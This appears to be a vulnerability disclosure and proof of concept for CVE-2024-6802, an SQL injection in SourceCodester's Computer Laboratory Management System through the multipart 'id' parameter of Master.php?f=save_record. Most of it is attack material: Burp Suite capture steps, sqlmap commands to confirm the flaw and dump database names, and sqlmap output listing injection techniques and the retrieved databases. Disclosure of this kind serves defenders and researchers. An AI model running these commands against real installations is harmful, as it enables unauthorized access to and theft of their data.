Skip to main content

CVE-2024-6802

 

Details

Attack type: SQL injection

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Vendor: SourceCodester

Product: Computer Laboratory Management System

Affected components: /lms/classes/Master.php?f=save_record

Injection parameter:MULTIPART id

 

POC

1

Intercept the request using Burpsuite Proxy.

2

Save the request to save_record.txt

The vulnerability can be verified with the following command:

sqlmap -r save_record.txt --batch

56

57

58

Parameter: MULTIPART id ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: -----------------------------20097612161463129383887948722
Content-Disposition: form-data; name="id"


Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: -----------------------------20097612161463129383887948722
Content-Disposition: form-data; name="id"


Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------20097612161463129383887948722
Content-Disposition: form-data; name="id"

Databases can be dumped using the following command:

sqlmap -r save_record.txt --batch --dbs

55

[02:45:07] [INFO] fetching database names
[02:45:07] [INFO] retrieved: 'information_schema'
[02:45:07] [INFO] retrieved: 'lms'
available databases [2]:
[*] information_schema
[*] lms